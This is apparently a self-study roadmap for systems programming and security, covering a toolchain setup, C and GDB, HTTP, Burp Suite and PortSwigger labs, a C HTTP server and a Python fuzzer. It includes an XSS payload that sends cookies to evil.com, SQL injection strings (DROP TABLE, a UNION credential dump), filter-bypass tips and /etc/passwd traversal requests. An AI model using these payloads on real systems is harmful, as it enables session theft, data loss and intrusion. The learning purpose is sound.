# PROJECT OBSESSION — THE COMPLETE INTERCONNECTED ROADMAP
## Every Phase, Every Concept, Every Practical Step — Wired Together

---

> **How to read this document:** Every concept taught in Phase 1 has an arrow pointing forward. Every tool introduced early reappears later in a harder context. Nothing is isolated. Read the connection callouts — they are the nervous system of this entire plan.

---

# PRE-PHASE: ENVIRONMENT ZERO
### *Before Day 1 of Month 1 — Your Machine Is Your Weapon, Configure It Once*

You will not debug your environment in Month 7. You configure it now, completely, and never touch it again unless something breaks.

---

## 1. Operating System Foundation

You are working on **Ubuntu 22.04 LTS** — both locally and on your DigitalOcean VPS. This is non-negotiable. The kernel module you write in Phase 4 targets the Linux kernel. Every `strace`, `ltrace`, and `GDB` session runs on Linux. macOS is a development toy for this roadmap. Windows does not exist.

**If you're on Windows, install WSL2 with Ubuntu 22.04 immediately:**
```bash
wsl --install -d Ubuntu-22.04
```

**If you're on macOS, run a local Ubuntu VM via UTM or VirtualBox.**

The reason this matters: In Phase 3, you will analyze ELF binaries. ELF (Executable and Linkable Format) is the Linux executable format. On macOS, binaries are Mach-O. On Windows, they are PE. If your local environment doesn't match your target, your mental model will fracture every time you switch contexts.

---

## 2. The Complete Toolchain Install — One Session

Run this once. Understand what each line installs and *why*:

```bash
# Core build tools
sudo apt update && sudo apt upgrade -y
sudo apt install -y build-essential gcc gdb make cmake

# Why build-essential? It installs gcc, g++, make, and the C standard library headers.
# Why separately install gdb? You will live in GDB. Know you installed it intentionally.

# Network inspection tools
sudo apt install -y wireshark tcpdump netcat-openbsd nmap curl wget

# Why wireshark? Phase 1: You will capture your own C HTTP server's TCP handshake.
# Why netcat? Phase 1: You will manually send raw HTTP requests to your server.
# Why nmap? Phase 3: Your Go recon tool will replicate what nmap does — you must
#            understand the tool before you automate it.

# Assembly toolchain
sudo apt install -y nasm binutils

# Why nasm? Intel syntax assembler. You will write shellcode in Phase 3.
# Why binutils? Provides objdump, readelf, nm — binary analysis tools.

# Memory debugging
sudo apt install -y valgrind

# Why valgrind? Phase 1: Run every C program through valgrind before your Python 
#               fuzzer touches it. Valgrind finds memory errors with surgical precision.
#               Your fuzzer finds crashes by brute force. Together they are complete.

# Python environment
sudo apt install -y python3 python3-pip python3-venv
pip3 install requests pwntools scapy

# Why pwntools now? You won't use it until Phase 3 but installing it early means
#                   you'll read its documentation passively and absorb its model.

# Go installation (always install from official binary, not apt)
wget https://go.dev/dl/go1.22.linux-amd64.tar.gz
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.22.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
source ~/.bashrc
go version

# Node.js via nvm (Node Version Manager)
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.7/install.sh | bash
source ~/.bashrc
nvm install 20
nvm use 20
npm install -g typescript

# Docker (Phase 4 deployment, install now, use later)
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo usermod -aG docker $USER
```

---

## 3. GDB Configuration — Do This Now

Create `~/.gdbinit`:
```
set disassembly-flavor intel
set pagination off
set print pretty on
```

**Why `intel` flavor?** AT&T syntax writes `movq %rax, %rbx`. Intel syntax writes `mov rbx, rax`. Intel syntax is destination-first, which is how you will write NASM assembly. If GDB speaks AT&T and you think in Intel, you will spend cognitive energy on translation instead of analysis. Eliminate the friction before it costs you.

---

## 4. Your Project File Structure — From Day 1

```
~/obsession/
├── phase1/
│   ├── c_utilities/        # grep clone, cat clone
│   ├── http_server/        # The Phase 1 capstone C server
│   ├── fuzzer/             # Python fuzzer for your own server
│   ├── design/             # Figma exports, Next.js static sites
│   └── DEVLOG.md           # Daily written output — mandatory
├── phase2/
│   ├── securedrop/         # The E2E encrypted file vault
│   ├── api/                # Go + Chi router + PostgreSQL + Redis
│   └── DEVLOG.md
├── phase3/
│   ├── reverse/            # Ghidra projects, crackmes
│   ├── vigilante/          # The Go fuzzer capstone
│   ├── shellcode/          # NASM shellcode experiments
│   └── DEVLOG.md
├── phase4/
│   ├── lkm/                # Linux Kernel Module
│   ├── saas/               # The live SaaS deployment
│   ├── bounty/             # HackerOne recon notes, report drafts
│   └── DEVLOG.md
└── resources/
    ├── books/              # PDF references
    ├── wordlists/          # SecLists for Phase 3 fuzzer
    └── notes/              # Concept breakdowns (Feynman technique)
```

Initialize git from Day 1:
```bash
cd ~/obsession
git init
echo "# PROJECT OBSESSION" > README.md
git add . && git commit -m "init: project structure initialized"
```

**The DEVLOG.md discipline:** Every single deep work block ends with a written entry. Minimum 150 words. Format:

```markdown
## DEVLOG — [DATE] — Phase [X], Week [Y]

**What I worked on:**
**What I actually understood:**
**What confused me:**
**How it connects to what I learned before:**
**Tomorrow's first task:**
```

The last field — *how it connects* — is where this roadmap is internalized.

---
---

# PHASE 1: MONTHS 1–3 — THE DIGITAL BEDROCK
## *The Compiler, The Protocol, The Pixel*

---

## THE CENTRAL THESIS OF PHASE 1

> **Everything a computer does is memory manipulation over a network.** A web application is bytes moving through a TCP socket into a heap-allocated buffer, rendered by a DOM parser. An SQL injection is a string that escapes one context and executes in another. A buffer overflow is a string that escapes its allocated memory and writes into a return address. The underlying mechanism is identical. Phase 1 makes this unification real in your hands.

---

## WEEK-BY-WEEK BREAKDOWN

---

### MONTH 1, WEEK 1–2: THE COMPILATION PIPELINE
**Source:** CS:APP Chapter 1

#### The Concept Chain You Must Build

Most developers treat compilation as a black box: write code → run program. You will never do this. Here is the exact mental model:

```
Source Code (.c)
      ↓  [Preprocessor — cpp]
Preprocessed Source (.i)   ← #include and #define expanded
      ↓  [Compiler — cc1]
Assembly Code (.s)         ← C translated to x86_64 ASM
      ↓  [Assembler — as]
Object File (.o)           ← ASM translated to machine code (ELF relocatable)
      ↓  [Linker — ld]
Executable (ELF binary)    ← Object files + libraries combined
```

**Practical walkthrough — see every stage yourself:**

```bash
# Write the simplest possible C program
cat > hello.c << 'EOF'
#include <stdio.h>
int main() {
    printf("hello\n");
    return 0;
}
EOF

# Stop after preprocessing — see what #include actually does
gcc -E hello.c -o hello.i
wc -l hello.i          # It was 5 lines. Now it's 700+. Where did that come from?
head -50 hello.i        # Read the expanded stdio.h declarations

# Stop after compilation — see the assembly GCC generates
gcc -S -O0 hello.c -o hello.s   # -O0 = no optimization, raw output
cat hello.s                      # Read every line. You will recognize this later.

# Stop after assembly — inspect the object file
gcc -c hello.c -o hello.o
file hello.o              # "ELF 64-bit LSB relocatable"
objdump -d hello.o        # Disassemble. The machine code is here.
readelf -s hello.o        # Symbol table — printf is UNDEFINED. The linker resolves it.

# Final link
gcc hello.o -o hello
readelf -s hello          # printf is now resolved to libc
./hello
```

**Why this matters for security (Phase 3 forward-connection):**
When you reverse engineer a binary in Ghidra in Month 7, you are reading the output of the linker. When you analyze a buffer overflow in GDB, you are reading the stack frame that the compiler constructed. The compilation pipeline is not academic — it is the anatomy of everything you will exploit.

---

### MONTH 1, WEEK 2–3: MEMORY LAYOUT — THE MOST IMPORTANT MODEL IN THIS ROADMAP

This is the single concept that everything else builds on. Learn it until you can draw it from memory.

```
HIGH ADDRESS (0xFFFFFFFFFFFFFFFF)
┌─────────────────────────────┐
│         Kernel Space        │  ← You cannot touch this (without the LKM in Phase 4)
├─────────────────────────────┤
│           Stack             │  ← Grows DOWNWARD
│    [local vars, ret addrs]  │
│              ↓              │
│                             │
│              ↑              │
│    [malloc'd memory]        │
│           Heap              │  ← Grows UPWARD
├─────────────────────────────┤
│           BSS               │  ← Uninitialized global/static vars (zeroed at startup)
├─────────────────────────────┤
│           Data              │  ← Initialized global/static vars
├─────────────────────────────┤
│           Text              │  ← Your compiled code (read-only)
└─────────────────────────────┘
LOW ADDRESS (0x0000000000000000)
```

**Practical walkthrough — print real addresses:**

```c
// memory_map.c
#include <stdio.h>
#include <stdlib.h>

int global_initialized = 42;        // DATA segment
int global_uninitialized;           // BSS segment

void function_on_stack() {
    int local = 0;                  // STACK
    printf("Stack variable:       %p\n", (void*)&local);
}

int main() {
    int stack_var = 1;
    void *heap_ptr = malloc(64);    // HEAP

    printf("Text (main func):     %p\n", (void*)main);
    printf("Data (global init):   %p\n", (void*)&global_initialized);
    printf("BSS  (global uninit): %p\n", (void*)&global_uninitialized);
    printf("Heap (malloc):        %p\n", heap_ptr);
    printf("Stack (local var):    %p\n", (void*)&stack_var);
    
    function_on_stack();
    free(heap_ptr);
    return 0;
}
```

```bash
gcc -o memory_map memory_map.c
./memory_map
```

Run this. Look at the actual hex addresses. Observe:
- Text segment is at a low address
- Heap address is above Data/BSS
- Stack address is near the top of user space
- Stack local variable address is *lower* than the function call's local variable — the stack is growing downward in real time

**Forward connection to Phase 3:** When you trigger a stack buffer overflow in a Nightmare CTF challenge, you will be overwriting memory from a low stack address upward toward the return address. You need this diagram burned into your memory first.

---

### MONTH 1, WEEK 3–4: C PROGRAMMING — MANUAL MEMORY MANAGEMENT

**Why C before everything else:**
TypeScript, Go, Python — every one of these languages hides memory from you behind a garbage collector or automatic memory manager. C does not. When you allocate memory in C, you are calling `brk()` or `mmap()` — actual Linux system calls. When you free it, you are telling the heap allocator to reclaim that region. When you forget, you have a memory leak. When you write past the end, you have undefined behavior — and undefined behavior is the source of every buffer overflow exploit you will study.

**The `grep` clone — practical walkthrough:**

Build this incrementally. Do not look up implementations. Solve each problem yourself:

```
Week 3 Target: grep v0.1
─────────────────────────
□ Accept two arguments: pattern and filename
□ Open the file with fopen()
□ Read line by line with fgets() into a fixed-size buffer
□ Use strstr() to search for the pattern in each line
□ Print matching lines to stdout
□ Close the file, return 0

Week 4 Target: grep v0.2
─────────────────────────
□ Handle the case where the file doesn't exist (errno + perror)
□ Handle the case where no arguments are provided
□ Support reading from stdin when no filename is given (like real grep)
□ Eliminate the fixed buffer — use dynamic allocation with malloc/realloc
```

**The malloc discipline:**

```c
// Every malloc follows this exact pattern. No exceptions.
char *buffer = malloc(size);
if (buffer == NULL) {
    fprintf(stderr, "malloc failed\n");
    exit(EXIT_FAILURE);  // or return error code
}
// ... use buffer ...
free(buffer);
buffer = NULL;  // Prevents use-after-free. Always do this.
```

**Valgrind discipline — run this after every C build:**

```bash
gcc -g -o mygrep mygrep.c    # -g flag includes debug symbols for valgrind
valgrind --leak-check=full --track-origins=yes ./mygrep "hello" test.txt
```

Valgrind output you need to be able to read:
```
==12345== HEAP SUMMARY:
==12345==     in use at exit: 0 bytes in 0 blocks  ← GOOD. No leaks.
==12345==   total heap usage: 3 allocs, 3 frees     ← allocs == frees. Correct.

# BAD output looks like:
==12345== Invalid write of size 1                   ← You wrote past your allocation
==12345==  at 0x401234: read_line (mygrep.c:47)
==12345== definitely lost: 64 bytes in 1 blocks     ← Memory leak
```

**Do not proceed to the next section until valgrind reports zero errors on both your `grep` and `cat` clones.**

---

### GDB — YOUR PRIMARY DEBUGGING INSTRUMENT

GDB is not a tool you use when things break. GDB is how you *read programs*. You will use GDB daily from this week until Month 12.

**The mandatory GDB command set — master these before anything else:**

```bash
gdb ./mygrep                    # Load program

# Inside GDB:
(gdb) break main                # Set breakpoint at main()
(gdb) break mygrep.c:47        # Set breakpoint at line 47
(gdb) run "hello" test.txt     # Run with arguments
(gdb) next                     # Execute next line (step OVER function calls)
(gdb) step                     # Execute next line (step INTO function calls)
(gdb) continue                 # Continue to next breakpoint

# Inspect memory:
(gdb) print buffer             # Print variable value
(gdb) print &buffer            # Print variable address
(gdb) x/16xb buffer           # Examine 16 bytes at buffer address in hex
(gdb) x/s buffer               # Examine as string
(gdb) x/4gx $rsp              # Examine 4 quadwords at stack pointer

# Inspect registers:
(gdb) info registers           # All registers
(gdb) print $rax               # Specific register
(gdb) print $rip               # Instruction pointer — where are you?

# Inspect stack frames:
(gdb) backtrace                # Full call stack
(gdb) frame 2                  # Switch to frame 2
(gdb) info locals              # Local variables in current frame
```

**Practical GDB walkthrough — watch a stack frame build:**

```c
// stack_demo.c
#include <stdio.h>

int add(int a, int b) {
    int result = a + b;     // Set a breakpoint here
    return result;
}

int main() {
    int x = 10;
    int y = 20;
    int z = add(x, y);     // Set a breakpoint here too
    printf("z = %d\n", z);
    return 0;
}
```

```bash
gcc -g -o stack_demo stack_demo.c
gdb ./stack_demo
(gdb) break add
(gdb) run
(gdb) info registers          # Look at RSP (stack pointer) and RBP (base pointer)
(gdb) x/16gx $rsp             # What's on the stack right now?
(gdb) backtrace               # main called add. You can see both frames.
(gdb) frame 1                 # Switch to main's frame
(gdb) info locals             # x=10, y=20, z=0 (not assigned yet)
```

Draw what you see. Map the register values to the memory layout diagram you built earlier. This is the Feynman technique in action — you don't understand the stack until you can draw it from a live GDB session.

---

### MONTH 2, WEEK 1–2: WEB PROTOCOLS — THE NETWORK LAYER

**The connection to Phase 1 C work:**
Your C server will speak HTTP over TCP. Before you write a single line of server code, you need to know exactly what HTTP looks like at the byte level. Not abstractly. At the byte level.

#### TCP/IP — The Transport Foundation

```
TCP Three-Way Handshake:

Client                          Server
  │                               │
  │──────── SYN ──────────────────▶│  "I want to connect, my seq# is X"
  │                               │
  │◀─────── SYN-ACK ──────────────│  "OK, my seq# is Y, I acknowledge X+1"
  │                               │
  │──────── ACK ──────────────────▶│  "I acknowledge Y+1. Connection open."
  │                               │
  │  [HTTP request/response now]  │
  │                               │
  │──────── FIN ──────────────────▶│  "I'm done sending"
  │◀─────── FIN-ACK ──────────────│
  │──────── ACK ──────────────────▶│  Connection closed.
```

**Practical walkthrough — capture and read this handshake yourself:**

```bash
# Terminal 1: Start a basic netcat server
nc -lvp 8080

# Terminal 2: Connect with curl and watch what happens
curl http://localhost:8080/

# Terminal 3: Capture with tcpdump
sudo tcpdump -i lo -A port 8080
```

Alternatively, open Wireshark, start capturing on `lo` (loopback), then run curl. Filter by `tcp.port == 8080`. Right-click the SYN packet → "Follow TCP Stream". You will see the entire conversation: the handshake, the raw HTTP request bytes, the response bytes.

#### HTTP/1.1 — What an HTTP Request Actually Is

This is a raw HTTP/1.1 GET request at the byte level:

```
GET /index.html HTTP/1.1\r\n
Host: localhost:8080\r\n
User-Agent: curl/7.88.1\r\n
Accept: */*\r\n
\r\n
```

That `\r\n` (carriage return + line feed) is not decorative. It is how HTTP delimits headers. A blank line (`\r\n\r\n`) signals the end of headers and the start of the body (for POST requests). **This is where HTTP parsing vulnerabilities come from.** HTTP Request Smuggling (an advanced PortSwigger topic) exploits ambiguity in how servers interpret these delimiters when two HTTP implementations disagree.

**Send a raw HTTP request manually with netcat:**

```bash
# Start your own server (Python's for now, yours in C later)
python3 -m http.server 8080

# In another terminal — type an HTTP request by hand:
printf "GET / HTTP/1.1\r\nHost: localhost:8080\r\n\r\n" | nc localhost 8080
```

You will see the server's raw HTTP/1.1 response: status line, headers, blank line, body. Every web framework in existence — Next.js, Django, Rails, Go's `net/http` — is parsing exactly this format.

**Forward connection to Phase 1 security:** When you practice XSS on PortSwigger, you are injecting payloads into HTTP request parameters. Burp Suite intercepts and modifies exactly these raw bytes. Understanding HTTP at this level makes Burp Suite intuitive rather than magical.

---

### MONTH 2, WEEK 2–4: BURP SUITE — THE WEB SECURITY INSTRUMENT

Burp Suite is a proxy. It sits between your browser and the target:

```
Browser ──▶ Burp Suite (localhost:8080) ──▶ Target Server
Browser ◀── Burp Suite                  ◀── Target Server
```

Every request passes through Burp. You can intercept, modify, replay, and fuzz it.

**Initial setup:**
1. Open Burp Suite Community Edition
2. Go to Proxy → Options → confirm listener is `127.0.0.1:8080`
3. Configure Firefox: Settings → Network Settings → Manual Proxy → HTTP Proxy: `127.0.0.1`, Port: `8080`
4. Install Burp's CA certificate in Firefox (Proxy → Intercept → Open Browser, or download from `http://burpsuite`)

**The four tools you need to master in Phase 1:**

| Tool | What It Does | When You Use It |
|---|---|---|
| **Proxy/Intercept** | Catch and modify requests in real time | Whenever you want to change a parameter before it hits the server |
| **Repeater** | Replay a captured request with modifications | Manually testing a single endpoint repeatedly |
| **Intruder** | Automated payload injection into marked positions | Fuzzing parameters with wordlists (SQLi payloads, XSS vectors) |
| **Decoder** | Encode/decode Base64, URL, HTML, Hex | When you see an obfuscated parameter and need to read it |

---

### MONTH 2, WEEK 3 — MONTH 3, WEEK 2: PORTSWIGGER LABS — PRACTICAL ATTACK WALKTHROUGH

Do not approach these as puzzles to be solved quickly. Approach them as **mechanisms to be understood completely.**

**For every lab, follow this protocol:**
1. Read the lab description — what vulnerability class?
2. Before opening Burp: what is the *theoretical mechanism* of this attack?
3. Open Burp, map the application's traffic manually first
4. Attempt the exploit
5. After success: write a 200-word DEVLOG entry explaining *why* it worked

#### XSS — Cross-Site Scripting: The Mechanism

XSS is not "inject `<script>alert(1)</script>`." That is the symptom. The mechanism is:

**User-supplied input is inserted into an HTML document without sanitization, causing the browser's HTML parser to interpret it as executable code rather than data.**

```
Vulnerable template:
<p>Welcome, [USERNAME]!</p>

Attacker input:
USERNAME = <script>document.location='https://evil.com/?c='+document.cookie</script>

Rendered HTML:
<p>Welcome, <script>document.location='https://evil.com/?c='+document.cookie</script>!</p>

Result: Browser executes attacker's JavaScript. Session cookie exfiltrated.
```

**The three XSS contexts — each requires different payloads:**

```html
<!-- Context 1: HTML body — direct tag injection -->
<div>[INJECTION]</div>
Payload: <img src=x onerror=alert(1)>

<!-- Context 2: HTML attribute — break out of attribute -->
<input value="[INJECTION]">
Payload: " onmouseover="alert(1)
Result: <input value="" onmouseover="alert(1)">

<!-- Context 3: JavaScript string — break out of string context -->
<script>var x = '[INJECTION]';</script>
Payload: ';alert(1);//
Result: <script>var x = '';alert(1);//';</script>
```

**The sanitization bypass mindset:** Developers know about `<script>`. They filter it. So you use `<img>`, `<svg>`, `<body>`, `<iframe>`, `<details>`. They filter `onerror`. You use `onload`, `onfocus`, `onblur`. They filter `alert`. You use `prompt`, `confirm`, `console.log`. Every filter is a list. Every list has omissions.

#### SQL Injection — The Mechanism

**The mechanism:** User-supplied input is concatenated into a SQL query string without parameterization, causing the database to interpret attacker data as SQL syntax.

```python
# Vulnerable code pattern (any language):
query = "SELECT * FROM users WHERE username = '" + username + "'"

# Normal input: username = "alice"
# Query: SELECT * FROM users WHERE username = 'alice'

# Attacker input: username = "' OR '1'='1"
# Query: SELECT * FROM users WHERE username = '' OR '1'='1'
# Result: Returns ALL users. Authentication bypassed.

# Attacker input: username = "'; DROP TABLE users;--"
# Query: SELECT * FROM users WHERE username = ''; DROP TABLE users;--'
# Result: users table deleted.
```

**The correct fix (parameterized queries):**
```python
# Safe — parameter is never interpreted as SQL syntax
cursor.execute("SELECT * FROM users WHERE username = %s", (username,))
```

**Why you must understand the fix:** In Phase 2, you will write a PostgreSQL backend in Go. You will use parameterized queries by default. You will know *why* you're doing it, not just that you should.

**Practical PortSwigger SQLi walkthrough — Lab: "SQL injection UNION attack":**

The UNION technique extracts data from other database tables:
```sql
-- Determine number of columns first:
' ORDER BY 1--    (no error)
' ORDER BY 2--    (no error)
' ORDER BY 3--    (error: only 2 columns)

-- Find which column accepts strings:
' UNION SELECT NULL,'a'--

-- Extract data:
' UNION SELECT username, password FROM users--
```

In Burp Repeater, you send each of these payloads manually, observe the response, and iterate. This workflow — hypothesis → payload → observe → refine — is the core mental loop of web security research.

---

### MONTH 2 — DESIGN: FIGMA AND THE 8PX GRID

**Why design is in this roadmap:** The Phase 4 SaaS capstone goes live. A technically flawless system with an unusable UI gets no users and fails as a bug bounty target surface. Design fluency makes your output indistinguishable from a funded startup.

**The 8px grid system:**

Every spacing and sizing decision is a multiple of 8:
```
4px  — micro spacing (icon padding, tag gaps)
8px  — base unit (small component padding)
16px — standard spacing (between elements in a component)
24px — medium spacing (between components)
32px — large spacing (section padding)
48px — XL spacing (between major sections)
64px — XXL (hero sections, page-level rhythm)
```

**Typography scale (modular scale, ratio 1.25):**
```
12px — captions, labels
14px — secondary text, helper text
16px — body (base)
20px — body large / subheadings
24px — h3
32px — h2
40px — h1
```

**In Figma, set these up as variables before you design anything:**

1. Create a new Figma file
2. Local Variables → Create variable collection: "Spacing"
3. Add: `space-1: 4`, `space-2: 8`, `space-3: 16`, `space-4: 24`, `space-5: 32`, `space-6: 48`, `space-7: 64`
4. Create variable collection: "Colors" — set your brand palette
5. Enable: Preferences → Snap to pixel grid

**Every design decision you make must answer: "Which grid multiple is this?"** If the answer is "I eyeballed it," redo it.

---

### MONTH 3: THE PHASE 1 CAPSTONE — HTTP SERVER IN C

This is the most important build of Phase 1. Every concept — compilation, memory layout, pointer arithmetic, TCP/IP, HTTP parsing, GDB debugging, valgrind memory checking — converges here.

**Architecture of your server:**

```
┌─────────────────────────────────────────────┐
│              HTTP Server in C                │
│                                             │
│  main()                                     │
│    └─▶ create_socket()        socket()      │
│    └─▶ bind_socket()          bind()        │
│    └─▶ listen_socket()        listen()      │
│    └─▶ accept_loop()                        │
│           └─▶ [new connection]              │
│                  └─▶ pthread_create()       │
│                         └─▶ handle_client() │
│                                └─▶ parse_http_request()  │
│                                └─▶ route_request()       │
│                                └─▶ send_http_response()  │
│                                └─▶ log_request()         │
│                                └─▶ close(client_fd)      │
└─────────────────────────────────────────────┘
```

**Build it in these exact stages — do not skip ahead:**

#### Stage 1: TCP Socket That Accepts a Connection

```c
// server_v1.c — just accept one connection and print what it sends
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 8080
#define BUFFER_SIZE 4096

int main() {
    int server_fd, client_fd;
    struct sockaddr_in address;
    int addrlen = sizeof(address);
    char buffer[BUFFER_SIZE] = {0};

    // Create socket file descriptor
    server_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (server_fd < 0) { perror("socket"); exit(EXIT_FAILURE); }

    // Allow port reuse (prevents "Address already in use" on restart)
    int opt = 1;
    setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    // Bind to port 8080 on all interfaces
    address.sin_family = AF_INET;
    address.sin_addr.s_addr = INADDR_ANY;
    address.sin_port = htons(PORT);     // htons: host to network byte order
    
    if (bind(server_fd, (struct sockaddr*)&address, sizeof(address)) < 0) {
        perror("bind"); exit(EXIT_FAILURE);
    }

    // Listen (backlog of 10 pending connections)
    if (listen(server_fd, 10) < 0) { perror("listen"); exit(EXIT_FAILURE); }
    
    printf("Server listening on port %d\n", PORT);

    // Accept ONE connection
    client_fd = accept(server_fd, (struct sockaddr*)&address, (socklen_t*)&addrlen);
    if (client_fd < 0) { perror("accept"); exit(EXIT_FAILURE); }

    // Read what the client sent
    ssize_t bytes_read = read(client_fd, buffer, BUFFER_SIZE - 1);
    printf("Received %zd bytes:\n%s\n", bytes_read, buffer);

    close(client_fd);
    close(server_fd);
    return 0;
}
```

```bash
gcc -o server_v1 server_v1.c
./server_v1
# In another terminal:
curl http://localhost:8080/
```

Your server will print the raw HTTP GET request that curl sent. **This is the HTTP protocol you studied — now you see it as raw bytes arriving in a C buffer.**

#### Stage 2: Parse HTTP Request and Send a Response

```c
// Add this function to parse the request line:
typedef struct {
    char method[8];       // "GET", "POST", etc.
    char path[256];       // "/index.html"
    char version[16];     // "HTTP/1.1"
} HttpRequest;

int parse_request(const char *raw, HttpRequest *req) {
    // First line is: "GET /path HTTP/1.1\r\n"
    return sscanf(raw, "%7s %255s %15s", req->method, req->path, req->version);
}

// Response generation:
void send_response(int client_fd, int status, const char *body) {
    char response[8192];
    const char *status_text = (status == 200) ? "OK" : 
                              (status == 404) ? "Not Found" : "Internal Server Error";
    
    int len = snprintf(response, sizeof(response),
        "HTTP/1.1 %d %s\r\n"
        "Content-Type: text/html\r\n"
        "Content-Length: %zu\r\n"
        "Connection: close\r\n"
        "\r\n"
        "%s",
        status, status_text, strlen(body), body);
    
    write(client_fd, response, len);
}
```

#### Stage 3: Multi-Threading With pthreads

```c
#include <pthread.h>

void *handle_client_thread(void *arg) {
    int client_fd = *(int*)arg;
    free(arg);  // We malloc'd this in the accept loop
    
    // ... parse request, send response ...
    
    close(client_fd);
    return NULL;
}

// In the accept loop:
while (1) {
    int *client_fd = malloc(sizeof(int));  // Heap-allocate to avoid race condition
    if (!client_fd) { perror("malloc"); continue; }
    
    *client_fd = accept(server_fd, (struct sockaddr*)&address, (socklen_t*)&addrlen);
    if (*client_fd < 0) { perror("accept"); free(client_fd); continue; }
    
    pthread_t thread;
    pthread_create(&thread, NULL, handle_client_thread, client_fd);
    pthread_detach(thread);  // Don't wait for thread to finish
}
```

**Why heap-allocate `client_fd`?** If you pass a stack pointer to the thread:
```c
// WRONG:
int client_fd = accept(...);
pthread_create(&thread, NULL, handle_client_thread, &client_fd);
// By the time the thread reads it, the loop has iterated and client_fd is overwritten.
```
This is a **race condition** — the exact vulnerability class you study in Phase 2's PortSwigger labs. You will experience it in your own code first.

#### Stage 4: The Python Fuzzer

```python
# fuzzer.py
import socket
import random
import string
import time

TARGET_HOST = "127.0.0.1"
TARGET_PORT = 8080

def send_raw(payload: bytes) -> str:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(3)
        s.connect((TARGET_HOST, TARGET_PORT))
        s.sendall(payload)
        response = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            response += chunk
        s.close()
        return response.decode('utf-8', errors='replace')
    except Exception as e:
        return f"ERROR: {e}"

# Test cases — each tests a different failure mode:
test_cases = [
    # Oversized method
    (b"A" * 10000 + b" / HTTP/1.1\r\nHost: localhost\r\n\r\n", "OVERFLOW: Method"),
    # Oversized path
    (b"GET /" + b"A" * 50000 + b" HTTP/1.1\r\nHost: localhost\r\n\r\n", "OVERFLOW: Path"),
    # Directory traversal
    (b"GET /../../../etc/passwd HTTP/1.1\r\nHost: localhost\r\n\r\n", "TRAVERSAL: etc/passwd"),
    (b"GET /..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\r\nHost: localhost\r\n\r\n", "TRAVERSAL: URL-encoded"),
    # Malformed request line
    (b"GET\r\n\r\n", "MALFORMED: no path"),
    (b"\r\n\r\n", "MALFORMED: empty"),
    # Null bytes
    (b"GET /\x00 HTTP/1.1\r\nHost: localhost\r\n\r\n", "NULL BYTE in path"),
    # Huge headers
    (b"GET / HTTP/1.1\r\n" + b"X-Custom: " + b"A" * 100000 + b"\r\n\r\n", "OVERFLOW: Header"),
    # HTTP/0.9 (no headers)
    (b"GET /\r\n", "HTTP/0.9 style"),
    # Body without Content-Length
    (b"POST / HTTP/1.1\r\nHost: localhost\r\n\r\n" + b"A" * 10000, "POST: no Content-Length"),
]

print(f"{'='*60}")
print(f"FUZZING {TARGET_HOST}:{TARGET_PORT}")
print(f"{'='*60}\n")

for payload, label in test_cases:
    print(f"[*] Sending: {label}")
    result = send_raw(payload)
    if result.startswith("ERROR"):
        print(f"[!] SERVER CRASHED OR UNREACHABLE: {result}")
    elif "HTTP/1.1" in result:
        status = result.split('\r\n')[0]
        print(f"[+] Response: {status}")
    else:
        print(f"[?] Unexpected: {result[:100]}")
    time.sleep(0.1)

print("\nFuzz complete.")
```

**When your server crashes:** Run it in GDB:
```bash
gdb ./server
(gdb) run
# Trigger the crash with the fuzzer
(gdb) backtrace          # Where did it crash?
(gdb) frame 0            # What was the state?
(gdb) info locals        # What were the variable values?
(gdb) x/32xb $rsp       # What does the stack look like?
```

Read the crash. Understand why it crashed. Fix the C code. Re-run valgrind. Re-run the fuzzer. This loop is **exactly what security researchers do with real software**, except the software is not yours.

---

# PHASE 1 → PHASE 2 CONNECTION MAP

Before starting Phase 2, every arrow below must be checkable:

```
C HTTP Server (Phase 1)
    ↓
Understanding of TCP connections, HTTP parsing, concurrent threads, memory safety
    ↓
Phase 2: You will write a Go HTTP API server.
The Go net/http package does everything your C server did — but automatically.
You will understand WHAT it's doing and WHERE bugs can exist because you built one from scratch.

Stack/Heap Memory Model (Phase 1)
    ↓
Mental model of where variables live and how they're accessed
    ↓
Phase 2: PostgreSQL stores data in pages on disk using B-tree structures (DDIA Chapters 1-3).
The concept of "how data is organized in memory/storage" is the same model, scaled up.

SQL Injection understanding (Phase 1 PortSwigger)
    ↓
Visceral understanding of why unparameterized queries are dangerous
    ↓
Phase 2: Every database query you write in Go uses pgx's parameterized queries.
You don't follow this rule because a linter says so. You follow it because you know what happens if you don't.

Burp Suite Repeater/Intruder (Phase 1)
    ↓
Ability to intercept, modify, and replay HTTP traffic at the byte level
    ↓
Phase 2 PortSwigger: SSRF, OAuth flaws, and Race Conditions all require precise
request manipulation. The tool is the same. The targets are harder.
```

---
---

# PHASE 2: MONTHS 4–6 — HIGH-FIDELITY CREATOR
## *Production Data Systems, Cryptographic Engineering, Logic Exploitation*

---

## THE CENTRAL THESIS OF PHASE 2

> **State is the attack surface.** Every logic vulnerability — SSRF, OAuth flaws, race conditions, insecure deserialization — is a consequence of a system that has more state than it can coherently validate. A race condition is two threads writing to the same state simultaneously. An OAuth flaw is the server trusting state it didn't generate. SSRF is the server performing network requests on behalf of state it accepted from the user. Phase 2 builds production-grade state management systems so you can learn to break them.

---

### MONTH 4, WEEK 1–2: DESIGNING DATA-INTENSIVE APPLICATIONS (DDIA)
**Chapters 1–5 — What You Actually Need**

Martin Kleppmann's DDIA is the most important book for understanding how production databases work. You are reading it because in Phase 2 you will use PostgreSQL, and in Phase 2's security block you will break systems that rely on database-backed state.

**Chapter 1 — Reliable, Scalable, Maintainable Systems:**
The three pillars. Reliability means the system works correctly even when things go wrong. Scalability means the system handles growth. Maintainability means other people can operate it. Every architectural decision in your SecureDrop clone will be evaluated against these.

**Chapter 3 — Storage and Retrieval (The Critical Chapter):**

This chapter explains what a database *actually does* with your data. Two storage engine models:

```
Log-Structured (LSM Tree) — e.g., RocksDB, Cassandra
Write path: Append to in-memory memtable → flush to SSTable on disk
Read path: Search memtable → search SSTables (newest to oldest)
